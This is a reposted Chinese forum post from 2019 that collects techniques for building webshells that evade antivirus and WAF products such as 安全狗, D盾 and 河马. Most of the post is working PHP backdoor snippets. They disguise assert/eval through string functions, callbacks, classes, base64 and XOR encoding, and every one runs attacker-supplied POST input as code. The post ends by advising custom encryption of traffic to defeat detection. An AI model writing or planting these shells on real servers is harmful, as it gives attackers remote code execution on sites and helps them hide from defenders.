anonymou5

 找回密码
 立即注册
搜索
查看: 57|回复: 0

【转载】对于免杀webshell的一些总结

[复制链接]
匿名
匿名  发表于 2019-1-28 11:24:41 |阅读模式
0x01 目录

0.关于eval 于 assert
1.字符串变形
2.定义函数绕过
3.回调函数
4.回调函数变形
5.特殊字符干扰
6.数组
7.类
8.编码绕过
9.无字符特征马
10.PHP7.1后webshell何去何从
11.总结

0x02 关于eval 于 assert

关于eval函数在php给出的官方说明是
  1. eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行 通俗的说比如你 <?php $a=eval;$a() ?> 这样是不行的 也造就了用eval的话达不到assert的灵活,但是在php7.1以上assert已经不行
复制代码
关于assert函数

  1. assert() 回调函数在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。 当信息能够被其他方法捕获,使用断言可以让它更快更方便!
复制代码
0x03 字符串变形

字符串变形多数用于BYPASS安全狗,相当对于D盾,安全狗更加重视"形" 一个特殊的变形就能绕过安全狗,看看PHP手册,有着很多关于操作字符串的函数
  1. ucwords() //函数把字符串中每个单词的首字符转换为大写。
  2. ucfirst() //函数把字符串中的首字符转换为大写。
  3. trim() //函数从字符串的两端删除空白字符和其他预定义字符。
  4. substr_replace() //函数把字符串的一部分替换为另一个字符串
  5. substr() //函数返回字符串的一部分。
  6. strtr() //函数转换字符串中特定的字符。
  7. strtoupper() //函数把字符串转换为大写。
  8. strtolower() //函数把字符串转换为小写。
  9. strtok() //函数把字符串分割为更小的字符串
  10. str_rot13() //函数对字符串执行 ROT13 编码。
复制代码
由于PHP的灵活性操作字符串的函数很多,我这里就不一一列举了

用substr_replace() 函数变形assert 达到免杀的效果
  1. <?php

  2. $a = substr_replace("assexx","rt",4);

  3. $a($_POST['x']);

  4. ?>
复制代码
其他函数类似 不一一列举了

0x04 定义函数绕过

定义一个函数把关键词分割达到bypass效果
  1. <?php
  2. function kdog($a){
  3.     $a($_POST['x']);
  4. }
  5. kdog(assert);
  6. ?>
复制代码
反之
  1. <?php
  2. function kdog($a){
  3.     assert($a);
  4. }
  5. kdog($_POST[x]);
  6. ?>
复制代码
效果一样,这种绕过方法,对安全狗还是比较有效的 在d盾面前就显得小儿科了 ,不过后面会讲到如何用定义函数的方法来 绕过d盾

0x05 回调函数
  1. call_user_func_array()
  2. call_user_func()
  3. array_filter()
  4. array_walk()  
  5. array_map()
  6. registregister_shutdown_function()
  7. register_tick_function()
  8. filter_var()
  9. filter_var_array()
  10. uasort()
  11. uksort()
  12. array_reduce()
  13. array_walk()
  14. array_walk_recursive()
复制代码
回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如
  1. <?php
  2. forward_static_call_array(assert,array($_POST[x]));
  3. ?>
复制代码
这个函数能过狗,但是D盾显示是一级

0x06 回调函数变形

前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用

定义一个函数
  1. <?php
  2. function test($a,$b){
  3.     array_map($a,$b);
  4. }
  5. test(assert,array($_POST['x']));
  6. ?>
复制代码
定义一个类
  1. <?php
  2. class loveme {
  3.     var $a;
  4.     var $b;
  5.     function __construct($a,$b) {
  6.         $this->a=$a;
  7.         $this->b=$b;
  8.     }
  9.     function test() {
  10.        array_map($this->a,$this->b);
  11.     }
  12. }
  13. $p1=new loveme(assert,array($_POST['x']));
  14. $p1->test();
  15. ?>
复制代码
0x07 特殊字符干扰

特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行,网上广为流传的连接符

初代版本
  1. <?php
  2. $a = $_REQUEST['a'];
  3. $b = null;
  4. eval($b.$a);
  5. ?>
复制代码
不过已经不能免杀了,利用适当的变形即可免杀 如
  1. <?php
  2. $a = $_POST['a'];
  3. $b = "\n";
  4. eval($b.=$a);
  5. ?>
复制代码
其他方法大家尽情发挥如"\r\n\t",函数返回,类,等等

除了连接符号 还有个命名空间的东西 \ 具体大家可以看看php手册
  1. <?php
  2. function dog($a){
  3.     \assert($a);
  4. }
  5. dog($_POST[x]);
  6. ?>
复制代码
当然还有其他的符号熟读PHP手册就会有不一样的发现

0x08 数组

把执行代码放入数组中执行绕过
  1. <?php
  2. $a = substr_replace("assexx","rt",4);
  3. $b=[''=>$a($_POST['q'])];
  4. ?>
复制代码
多维数组
  1. <?php
  2. $b = substr_replace("assexx","rt",4);
  3. $a = array($arrayName = array('a' => $b($_POST['q'])));
  4. ?>
复制代码
0x09 类

说到类肯定要搭配上魔术方法比如 __destruct(),__construct() 直接上代码
  1. <?php

  2. class me
  3. {
  4.   public $a = '';
  5.   function __destruct(){

  6.     assert("$this->a");
  7.   }
  8. }

  9. $b = new me;
  10. $b->a = $_POST['x'];

  11. ?>
复制代码
用类把函数包裹,D盾对类查杀较弱

0x10 编码绕过

用php的编码函数,或者用异或等等 简单的base64_decode,其中因为他的正则匹配可以加入一些下划线干扰杀软
  1. <?php
  2. $a = base64_decode("YXNz+ZX____J____0");
  3. $a($_POST[x]);
  4. ?>
复制代码
异或
  1. <?php
  2. $a= ("!"^"@").'ssert';
  3. $a($_POST[x]);
  4. ?>
复制代码
0x11 无字符特征马

对于无特征马这里我的意思是 无字符特征

    1.利用异或,编码等方式 例如p神博客的
  1. <?php
  2. $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
  3. $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
  4. $___=$__;
  5. $_($___[_]); // assert($_POST[_]);
复制代码
1.利用正则匹配字符 如Tab等 然后转换为字符

2.利用POST包获取关键参数执行 例如
  1. <?php
  2. $decrpt = $_POST['x'];
  3. $arrs = explode("|", $decrpt)[1];
  4. $arrs = explode("|", base64_decode($arrs));
  5. call_user_func($arrs[0],$arrs[1]);
  6. ?>
复制代码
0x12 PHP7.1后webshell何去何从

在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马。

总结

对于安全狗杀形,d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是不错的选择。 对于关键词的后传入对免杀安全狗,d盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化 用户可以对传出的post数据进行自定义脚本加密,再由webshell进行解密获取参数,那么以现在的软WAF查杀能力 几乎为0,安全软件也需要与时俱进了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

( 蜀ICP备18025895号 )

GMT+8, 2019-3-21 13:32 , Processed in 0.243001 second(s), 20 queries .

Powered by anonymou5 0.1

快速回复 返回顶部 返回列表